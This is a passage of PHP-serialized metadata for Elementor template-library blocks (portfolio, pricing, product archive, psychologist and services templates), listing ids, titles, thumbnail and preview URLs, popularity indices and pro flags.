3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_2.png\";s:12:\"tmpl_created\";i:1520443423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:263;s:16:\"popularity_index\";i:636;s:11:\"trend_index\";i:608;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:689;a:16:{s:4:\"tmpl\";i:602;s:2:\"id\";i:5082;s:5:\"title\";s:11:\"Portfolio 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_4.png\";s:12:\"tmpl_created\";i:1520520589;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:264;s:16:\"popularity_index\";i:558;s:11:\"trend_index\";i:654;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:690;a:16:{s:4:\"tmpl\";i:605;s:2:\"id\";i:5107;s:5:\"title\";s:11:\"Portfolio 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_7.png\";s:12:\"tmpl_created\";i:1520520594;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:265;s:16:\"popularity_index\";i:380;s:11:\"trend_index\";i:347;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:691;a:16:{s:4:\"tmpl\";i:607;s:2:\"id\";i:5125;s:5:\"title\";s:11:\"Portfolio 6\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_black_8.png\";s:12:\"tmpl_created\";i:1520520597;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:266;s:16:\"popularity_index\";i:236;s:11:\"trend_index\";i:386;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:692;a:16:{s:4:\"tmpl\";i:596;s:2:\"id\";i:5007;s:5:\"title\";s:11:\"Portfolio 7\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/portfolio_white_1.png\";s:12:\"tmpl_created\";i:1520520578;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:9:\"portfolio\";s:4:\"tags\";s:13:\"[\"Portfolio\"]\";s:10:\"menu_order\";i:267;s:16:\"popularity_index\";i:44;s:11:\"trend_index\";i:183;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:693;a:16:{s:4:\"tmpl\";i:434;s:2:\"id\";i:4509;s:5:\"title\";s:9:\"Pricing 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_1.png\";s:12:\"tmpl_created\";i:1520443310;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:268;s:16:\"popularity_index\";i:703;s:11:\"trend_index\";i:641;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:694;a:16:{s:4:\"tmpl\";i:439;s:2:\"id\";i:4553;s:5:\"title\";s:10:\"Pricing 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_4.png\";s:12:\"tmpl_created\";i:1520443319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/pricing-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:269;s:16:\"popularity_index\";i:511;s:11:\"trend_index\";i:506;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:695;a:16:{s:4:\"tmpl\";i:441;s:2:\"id\";i:4572;s:5:\"title\";s:10:\"Pricing 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_5.png\";s:12:\"tmpl_created\";i:1520443324;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/pricing-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:270;s:16:\"popularity_index\";i:308;s:11:\"trend_index\";i:248;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:696;a:16:{s:4:\"tmpl\";i:442;s:2:\"id\";i:4580;s:5:\"title\";s:10:\"Pricing 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_6.png\";s:12:\"tmpl_created\";i:1520443326;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/pricing-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:271;s:16:\"popularity_index\";i:576;s:11:\"trend_index\";i:526;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:697;a:16:{s:4:\"tmpl\";i:444;s:2:\"id\";i:4597;s:5:\"title\";s:10:\"Pricing 13\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_7.png\";s:12:\"tmpl_created\";i:1520443330;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/pricing-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:272;s:16:\"popularity_index\";i:613;s:11:\"trend_index\";i:450;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:698;a:16:{s:4:\"tmpl\";i:446;s:2:\"id\";i:4613;s:5:\"title\";s:10:\"Pricing 14\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_8.png\";s:12:\"tmpl_created\";i:1520443334;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/pricing-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:273;s:16:\"popularity_index\";i:581;s:11:\"trend_index\";i:568;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:699;a:16:{s:4:\"tmpl\";i:436;s:2:\"id\";i:4529;s:5:\"title\";s:9:\"Pricing 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_2.png\";s:12:\"tmpl_created\";i:1520443314;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:274;s:16:\"popularity_index\";i:609;s:11:\"trend_index\";i:613;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:700;a:16:{s:4:\"tmpl\";i:438;s:2:\"id\";i:4545;s:5:\"title\";s:9:\"Pricing 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_3.png\";s:12:\"tmpl_created\";i:1520443317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:275;s:16:\"popularity_index\";i:707;s:11:\"trend_index\";i:825;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:701;a:16:{s:4:\"tmpl\";i:440;s:2:\"id\";i:4562;s:5:\"title\";s:9:\"Pricing 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_4.png\";s:12:\"tmpl_created\";i:1520443322;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:276;s:16:\"popularity_index\";i:697;s:11:\"trend_index\";i:821;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:702;a:16:{s:4:\"tmpl\";i:443;s:2:\"id\";i:4589;s:5:\"title\";s:9:\"Pricing 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_6.png\";s:12:\"tmpl_created\";i:1520443327;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:277;s:16:\"popularity_index\";i:716;s:11:\"trend_index\";i:639;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:703;a:16:{s:4:\"tmpl\";i:445;s:2:\"id\";i:4605;s:5:\"title\";s:9:\"Pricing 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_7.png\";s:12:\"tmpl_created\";i:1520443332;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:278;s:16:\"popularity_index\";i:738;s:11:\"trend_index\";i:773;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:704;a:16:{s:4:\"tmpl\";i:433;s:2:\"id\";i:4500;s:5:\"title\";s:9:\"Pricing 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_1.png\";s:12:\"tmpl_created\";i:1520443308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:279;s:16:\"popularity_index\";i:500;s:11:\"trend_index\";i:451;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:705;a:16:{s:4:\"tmpl\";i:435;s:2:\"id\";i:4521;s:5:\"title\";s:9:\"Pricing 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_2.png\";s:12:\"tmpl_created\";i:1520443312;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:280;s:16:\"popularity_index\";i:311;s:11:\"trend_index\";i:372;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:706;a:16:{s:4:\"tmpl\";i:437;s:2:\"id\";i:4537;s:5:\"title\";s:9:\"Pricing 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_3.png\";s:12:\"tmpl_created\";i:1520443315;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/pricing-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"Pricing\"]\";s:10:\"menu_order\";i:281;s:16:\"popularity_index\";i:589;s:11:\"trend_index\";i:841;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:707;a:16:{s:4:\"tmpl\";i:701;s:2:\"id\";i:9239;s:5:\"title\";s:17:\"product archive 1\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-1.png\";s:12:\"tmpl_created\";i:1532953482;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/product-archive-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:282;s:16:\"popularity_index\";i:60;s:11:\"trend_index\";i:25;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:708;a:16:{s:4:\"tmpl\";i:702;s:2:\"id\";i:9247;s:5:\"title\";s:17:\"product archive 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-2.png\";s:12:\"tmpl_created\";i:1532953793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/product-archive-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:283;s:16:\"popularity_index\";i:71;s:11:\"trend_index\";i:30;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:709;a:16:{s:4:\"tmpl\";i:703;s:2:\"id\";i:9254;s:5:\"title\";s:17:\"product archive 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-3.png\";s:12:\"tmpl_created\";i:1532954032;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/product-archive-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:284;s:16:\"popularity_index\";i:73;s:11:\"trend_index\";i:44;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:710;a:16:{s:4:\"tmpl\";i:1046;s:2:\"id\";i:15204;s:5:\"title\";s:24:\"Psychologist &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/09/404.jpg\";s:12:\"tmpl_created\";i:1600161419;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/psychologist-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:40:\"[\"404\",\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:285;s:16:\"popularity_index\";i:574;s:11:\"trend_index\";i:493;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:711;a:16:{s:4:\"tmpl\";i:1047;s:2:\"id\";i:15212;s:5:\"title\";s:28:\"Psychologist &#8211; Archive\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/09/Blog.jpg\";s:12:\"tmpl_created\";i:1600162340;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/psychologist-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:286;s:16:\"popularity_index\";i:379;s:11:\"trend_index\";i:358;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:712;a:16:{s:4:\"tmpl\";i:1048;s:2:\"id\";i:15219;s:5:\"title\";s:27:\"Psychologist &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/09/Footer.jpg\";s:12:\"tmpl_created\";i:1600163069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/psychologist-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:43:\"[\"Footer\",\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:287;s:16:\"popularity_index\";i:599;s:11:\"trend_index\";i:500;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:713;a:16:{s:4:\"tmpl\";i:1049;s:2:\"id\";i:15230;s:5:\"title\";s:27:\"Psychologist &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/09/Header.png\";s:12:\"tmpl_created\";i:1600163444;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/psychologist-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"Header\",\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:288;s:16:\"popularity_index\";i:429;s:11:\"trend_index\";i:423;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:714;a:16:{s:4:\"tmpl\";i:1050;s:2:\"id\";i:15240;s:5:\"title\";s:34:\"Psychologist &#8211; single post 1\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/09/Single-Post.png\";s:12:\"tmpl_created\";i:1600164087;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/psychologist-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:289;s:16:\"popularity_index\";i:562;s:11:\"trend_index\";i:570;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:715;a:16:{s:4:\"tmpl\";i:1051;s:2:\"id\";i:15251;s:5:\"title\";s:34:\"Psychologist &#8211; single post 2\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2020/09/Single-Service-Page.png\";s:12:\"tmpl_created\";i:1600165179;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/psychologist-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:290;s:16:\"popularity_index\";i:507;s:11:\"trend_index\";i:368;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:716;a:16:{s:4:\"tmpl\";i:412;s:2:\"id\";i:4313;s:5:\"title\";s:11:\"Services 13\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_8.png\";s:12:\"tmpl_created\";i:1520443268;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:291;s:16:\"popularity_index\";i:115;s:11:\"trend_index\";i:53;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:717;a:16:{s:4:\"tmpl\";i:413;s:2:\"id\";i:4324;s:5:\"title\";s:11:\"Services 14\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_9.png\";s:12:\"tmpl_created\";i:1520443270;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:292;s:16:\"popularity_index\";i:277;s:11:\"trend_index\";i:138;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:718;a:16:{s:4:\"tmpl\";i:418;s:2:\"id\";i:4368;s:5:\"title\";s:11:\"Services 16\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_13.png\";s:12:\"tmpl_created\";i:1520443279;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:293;s:16:\"popularity_index\";i:62;s:11:\"trend_index\";i:59;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:719;a:16:{s:4:\"tmpl\";i:420;s:2:\"id\";i:4391;s:5:\"title\";s:11:\"Services 17\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_14.png\";s:12:\"tmpl_created\";i:1520443283;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:294;s:16:\"popularity_index\";i:153;s:11:\"trend_index\";i:120;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:720;a:16:{s:4:\"tmpl\";i:403;s:2:\"id\";i:4235;s:5:\"title\";s:11:\"Services 18\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_2.png\";s:12:\"tmpl_created\";i:1520443251;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:295;s:16:\"popularity_index\";i:273;s:11:\"trend_index\";i:172;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:721;a:16:{s:4:\"tmpl\";i:417;s:2:\"id\";i:4357;s:5:\"title\";s:11:\"Services 20\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_12.png\";s:12:\"tmpl_created\";i:1520443277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:296;s:16:\"popularity_index\";i:45;s:11:\"trend_index\";i:45;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:722;a:16:{s:4:\"tmpl\";i:415;s:2:\"id\";i:4341;s:5:\"title\";s:11:\"Services 21\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_11.png\";s:12:\"tmpl_created\";i:1520443274;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:297;s:16:\"popularity_index\";i:142;s:11:\"trend_index\";i:114;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:723;a:16:{s:4:\"tmpl\";i:414;s:2:\"id\";i:4332;s:5:\"title\";s:11:\"Services 22\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_10.png\";s:12:\"tmpl_created\";i:1520443272;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-22/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:298;s:16:\"popularity_index\";i:138;s:11:\"trend_index\";i:149;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:724;a:16:{s:4:\"tmpl\";i:401;s:2:\"id\";i:4212;s:5:\"title\";s:11:\"Services 23\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_1.png\";s:12:\"tmpl_created\";i:1520443248;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-23/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:299;s:16:\"popularity_index\";i:136;s:11:\"trend_index\";i:302;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:725;a:16:{s:4:\"tmpl\";i:408;s:2:\"id\";i:4276;s:5:\"title\";s:11:\"Services 